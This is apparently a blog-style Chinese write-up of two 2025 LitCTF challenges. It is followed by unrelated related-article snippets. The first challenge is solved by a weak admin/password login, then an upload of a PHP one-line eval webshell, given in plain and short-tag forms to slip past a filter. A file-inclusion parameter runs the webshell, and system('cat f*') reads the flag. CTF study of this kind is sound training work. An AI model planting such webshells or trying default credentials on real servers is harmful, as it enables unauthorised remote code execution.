2025LitCTF 复现
easy_file
登录界面
尝试admin 和密码1
没成功
结果尝试了弱口令 admin 用户和 password 密码就登录成功了
文件上传
新建一个空的 新建木马.txt 文件发现上传成功
然后写入一句话木马
<?php @eval($_POST['a']); ?>上传失败
说明可能是有字符被过滤了,猜测是php标签,然后给它换成短标签
<?=@eval($_POST['a']);?>
发现上传成功,把文件名改一下吧,方便后面访问
结果抓包改后缀上传发现php后缀被过滤
尝试了各种后缀都上传失败,返回看有没有提示的时候突然反应过来题目名是 file,所以尝试一下任意文件读取
思路就是利用 file 读取上传的 xjmuma.txt 文件,然后文件就被解析咯,就可以get shell 了
那就 file=上传的文件(猜测在当前目录下的 uploads/xjmuma.txt 目录)
发现可以查看 php 配置信息,说明木马文件被解析了
但是这样有一个问题,蚁剑是连不上包含的地址的
所以还是只能用system系统执行命令
system('cat f*');然后一cat就出flag了
nest_js
又是一个登录界面
也不知道是环境出问题了还是怎么,直接同样用弱口令 admin 用户和 password 密码就登录得到flag了
而且flag是对的
更新中 ing......
相关文章:
2025LitCTF 复现
easy_file 登录界面 尝试admin 和密码1 没成功 结果尝试了弱口令 admin 用户和 password 密码就登录成功了 文件上传 新建一个空的 新建木马.txt 文件发现上传成功 然后写入一句话木马 <?php eval($_POST[a]); ?> 上传失败 说明可能是有字符被过滤了,猜…...
英语中最难学的部分是时态
英语中最难学的部分是时态。英语的时态体系包含16种时态,每种时态都有其独特的用法和规则,这使得时态成为英语学习中的一个难点 。 时态的定义和分类 时态可以分为时间和体态两个维度: 时间:现在时、过去时、将来时、过…...
Python 如何让自动驾驶的“眼睛”和“大脑”真正融合?——传感器数据融合的关键技术解析
Python 如何让自动驾驶的“眼睛”和“大脑”真正融合?——传感器数据融合的关键技术解析 自动驾驶技术从来都不是“单兵作战”。如果你细看一辆自动驾驶汽车,它其实是一个传感器的集合体:摄像头、激光雷达(LiDAR)、毫米波雷达、超声波传感器、GPS……这些传感器各自发挥作…...
使用C# 快速删除Excel表格中的重复行数据-详解
目录 简介 使用工具 C# 删除Excel工作表中的重复行 C# 删除指定Excel单元格区域中的重复行 C# 基于特定列删除重复行 RemoveDuplicates 方法快速比较 简介 重复行是指在Excel表格中完全相同的多行数据。这些冗余行的存在可能源于多种原因,例如: …...
WPF-Prism学习笔记之 “导航功能和依赖注入“
新建空白模板(Prism) 新建好后会有自动创建ViewModels和Views 在"MainWindow.xaml"文件里面标题去绑定了一个属性"Title",而"MainWindowViewModel.cs"里面继承一个非常重要的"BindbleBase"(prism框架里面非常重要的)。所以…...
中国城市间地理距离矩阵(2024)
1825 中国城市间地理距离矩阵(2024) 数据简介 中国城市间地理距离矩阵数据集,通过审图号GS(2024)0650的中国城市地图在Albers投影坐标系中进行计算得出矩阵表格,单位为KM,方便大家研究使用。 中国城市地理距离矩阵数据通过计算城市中心距离…...
【孙悟空喝水】2022-2-7
缘由C编程问题求解:9634: 孙悟空喝水-编程语言-CSDN问答 void 孙悟空喝水() {//缘由https://ask.csdn.net/questions/7639865?spm1005.2025.3001.5141int x 2, n 0; double s 0, ss 0;std::cin >> n;while ((int)s < n)s 1.0 / x, ss (x - 1.0) / …...
`sysctl`命令深度剖析:如何优化内核参数以提升服务器网络/IO性能?
更多服务器知识,尽在hostol.com 嘿,各位Linux服务器的“老司机”和“赛车手”们!咱们把服务器比作一辆高性能跑车,日常跑起来是很快,但你有没有想过,这辆“跑车”出厂时的默认设置,可能只是为了…...
AxumStatusCode细化Rust Web标准格式响应
1. Axum 中的 StatusCode 概述 axum::http::StatusCode 提供了 HTTP 状态码的枚举,涵盖了从 100 到 599 的所有标准状态码。 通过使用这些状态码,您可以精确地控制 HTTP 响应的语义,例如成功、客户端错误、服务器错误等。 1.1 常用状态码 …...
【备战秋招】C++音视频开发经典面试题整理
1、简要介绍一下对 H.264 的了解? 1)基础描述 H.264 是由国际标准组织机构(ISO)下属的运动图象专家组(MPEG)和国际电传视讯联盟远程通信标准化组织(ITU-T)开发的系列编码标准之一。…...
【音频处理】java流式调用ffmpeg命令
今天发现一个ffmpeg的用法,用子进程直接从标准输入写入输入,就可以从标准流式输出获取转码结果。 这样的好处是不用去写ffmpeg的代码,只需要写对ffmpeg的命令、在输入输出的地方加缓存就能进行流式转码了,方便快捷。 但是也有坏处…...
《java创世手记》---java基础篇(下)
《Java 创世手记 - 基础篇(下)》 第五章:契约与规范 —— 接口 (Interfaces) 与抽象类 (Abstract Classes) 造物主,在你日益繁荣的世界里,你发现仅仅依靠“继承”来构建“物种体系”有时会遇到一些限制。比如&#x…...
【MySQL】C语言连接
要使用C语言连接mysql,需要使用mysql官网提供的库,大家可以去官网下载 我们使用C接口库来进行连接 要正确使用,我们需要做一些准备工作: 保证mysql服务有效在官网上下载合适自己平台的mysql connect库,以备后用 下载开发库 s…...
How API Gateways handle raw TCP packets
How these gateways actually perform their roles at the HTTP packet level? Let’s break it down into something more concrete with examples of how these gateways perform their “unique entrance” function by requiring clients to follow specific protocols, …...
芯片配置文件自动化生成
代码的主要功能是将设置了芯片寄存器的Excel表格(.xls或.xlsx)中的特定工作表的数据转换成SVD格式。 步骤 Excel文件读取 使用xlrd库打开Excel文件处理.xls格式的特殊情况(formatting_infoTrue)获取"global"工作表数…...
新能源汽车与油车销量
中国油车与新能源车销量对比(2022-2025年) 1. 市场份额演化(2022-2025年) 年份 新能源车销量 (渗透率) 燃油车销量 (渗透率) 关键事件 2022 688.7万辆…...
LVS-DR 负载均衡集群
目录 一、简介 1.1 LVS-DR工作原理核心特性 1.2 数据包流向深度解析 二、实验环境准备与规划 三、LVS调度器配置实战 3.1 绑定虚拟IP地址(VIP) 3.2 调整内核参数禁用重定向 3.3 配置负载均衡策略 四、真实服务器节点配置 4.1 绑定VIP到lo接口 …...
基于Java,SpringBoot,Vue,UniAPP宠物洗护医疗喂养预约服务商城小程序管理系统设计
摘要 随着宠物经济的快速发展,宠物主对宠物服务的便捷性、专业性需求日益增长。本研究设计并实现了一套宠物洗护医疗喂养预约服务小程序系统,采用 Java 与 SpringBoot 构建后端服务,结合 Vue 开发管理后台,通过 UniAPP 实现多端适…...
中车靶场,网络安全暑期实训营
不善攻防,何谈就业? 实训目的:提升实战能力,直通就业快道。 实训对象:面向计算机相关专业、有兴趣接触网络攻防、大专及以上学历的学员。 知识准备 为确保高效实训,学员需具备一定的实战基础。报名后&am…...
2.2.2 06年T1
成功的同化机器——美国:2006年考研英语(一)Text 1精析 本文解析2006年考研英语(一)第一篇文章,揭示美国社会强大的文化同化力及其表现。 一、原文与翻译 Paragraph 1:美国社会的同化本质 L1: …...
split_conversion将json转成yolo训练用的txt,在直接按照8:1:1的比例分成训练集,测试集,验证集
第一章 使用说明 类别自己在代码中改,其他四个参数 --json-folder:json文件夹路径 --txt-folder:转换成功后txt的存放路径 --images-dir:图片文件夹路径 --save-dir:转换完成分割后所有文件的路径 终端命令行:p…...
响应式系统与Spring Boot响应式应用开发
响应式系统概述 过去十年间,为应对移动和云计算的需求,软件行业通过改进开发流程来构建更稳定、健壮且灵活的软件系统。这种演进不仅服务于传统用户端(桌面/Web),还需支持多样化设备(手机、传感器等)。为应对这些挑战,多个组织共同制定了《响应式宣言》(2014年发布)…...
【第1章 基础知识】1.8 在 Canvas 中使用 HTML 元素
文章目录 前言示例-橡皮筋式选取框示例代码 前言 尽管我们可以说 Canvas 是 HTML5 之中最棒的功能,不过在实现网络应用程序时,很少会单独使用它。在绝大多数情况下,你都会将一个或更多的 canvas 元素与其他 HTML 控件结合起来使用࿰…...
c++流之sstream/堆or优先队列的应用[1]
目录 c流之sstream 解释 注意事项 215.数据流的第k大 问题分析 修正代码 主要修改点 优先队列的比较规则 代码中的比较逻辑 为什么这样能维护第 k 大元素? 举个例子 总结 Python 实现(使用heapq库) Java 实现(使用P…...
SAR ADC 比较器噪声分析(二)
SAR ADC的比较器是非常重要的模块,需要仔细设计。主要考虑比较器的以下指标: 1)失调电压 2)输入共模范围 3)比较器精度 4)传输延时 5)噪声 6)功耗 这里主要讲一下动态比较器的noise。 动态比较器一般用于高速SAR ADC中,且精度不会超过12bit…...
c#与java的相同点和不同点
C# 和 Java 是两大主流的、面向对象的、托管型编程语言,它们共享许多相似的设计理念和语法,但也在细节、生态系统和运行平台上存在显著差异。以下是它们的相同点和不同点的详细对比: 一、相同点 (核心相似之处) 语法高度相似: 都源…...
phpmyadmin
安装PHPMyAdmin PHPMyAdmin通常可通过包管理器安装或手动部署。对于Linux系统(如Ubuntu),使用以下命令安装: sudo apt update sudo apt install phpmyadmin安装过程中会提示选择Web服务器(如Apache或Nginx࿰…...
机器学习Day5-模型诊断
实现机器学习算法的技巧。当我们训练模型或使用模型时,发现预测误差很 大,可以考虑进行以下优化: (1)获取更多的训练样本 (2)使用更少的特征 (3)获取其他特征 ÿ…...
如何将 WSL 的 Ubuntu-24.04 迁移到其他电脑
在使用 Windows Subsystem for Linux (WSL) 时,我们可能会遇到需要将现有的 WSL 环境迁移到其他电脑的情况。无论是为了备份、更换设备,还是在不同电脑之间共享开发环境,掌握迁移 WSL 子系统的方法都是非常有用的。本文将以 Ubuntu-24.04 为例…...
金融欺诈有哪些检测手段
金融欺诈检测是一个多层次的动态防御过程,需要结合技术手段、数据分析、人工智能和人工审核。以下是当前主流的检测手段和技术分类。 ### **一、核心技术手段** 1. **规则引擎(Rule-Based Systems)** - **原理**:预设基于历史…...